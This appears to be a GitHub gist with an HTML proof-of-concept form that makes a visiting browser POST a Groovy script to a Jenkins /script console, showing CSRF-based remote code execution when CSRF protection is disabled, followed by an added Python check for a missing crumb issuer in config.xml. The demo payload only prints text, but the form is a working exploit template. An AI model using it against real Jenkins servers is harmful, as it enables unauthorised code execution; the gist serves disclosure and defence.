Gist JLLeitschuh/1715fb23d0d6f11be1bb703198b0ae83
Created February 21, 2019 17:51
Demonstrates a CSRF Remote Code Execution attack against a Jenkins instance that has CSRF protection disabled.
<html>
  <body>
    <form action="http://corperate-jenkins.lab.com:8080/script" method="POST">
      <input type="hidden" name="script"
             value="println 'Hello! I just ran an arbitrary bit of code on Jenkins!'; println Jenkins.instance.slaves"/>
      <input type="submit" value="Submit!"/>
    </form>
  </body>
</html>
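A defender-side check for the precondition this form relies on, added here as an example and not part of the original gist: it audits a controller's `config.xml` for a configured crumb issuer. It assumes CSRF protection appears in that file as a top-level `<crumbIssuer>` element; the sample configs are constructed and the function names are hypothetical.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample data, not taken from a real controller.
CSRF_DISABLED = """<?xml version='1.1' encoding='UTF-8'?>
<hudson>
  <useSecurity>true</useSecurity>
</hudson>"""

CSRF_ENABLED = """<?xml version='1.1' encoding='UTF-8'?>
<hudson>
  <useSecurity>true</useSecurity>
  <crumbIssuer class="hudson.security.csrf.DefaultCrumbIssuer">
    <excludeClientIPFromCrumb>false</excludeClientIPFromCrumb>
  </crumbIssuer>
</hudson>"""


def parse_config(text):
    # Drop the XML declaration first: Jenkins writes version 1.1,
    # which expat-based parsers may reject.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", text, count=1)
    return ET.fromstring(body)


def audit_csrf(text):
    """Return a list of findings; an empty list means a crumb issuer is configured."""
    root = parse_config(text)
    findings = []
    issuer = root.find("crumbIssuer")  # assumption: direct child of the root element
    if issuer is None:
        findings.append(
            "no <crumbIssuer>: cross-site POSTs such as a form targeting "
            "/script are accepted without a crumb"
        )
    elif not issuer.get("class"):
        findings.append("<crumbIssuer> has no class attribute; verify on the controller")
    return findings


if __name__ == "__main__":
    for name, cfg in (("disabled", CSRF_DISABLED), ("enabled", CSRF_ENABLED)):
        print(name, audit_csrf(cfg) or "crumb issuer configured")
```

Run it against a copy of `$JENKINS_HOME/config.xml`; any finding means the controller should have a crumb issuer enabled before users browse other sites while logged in.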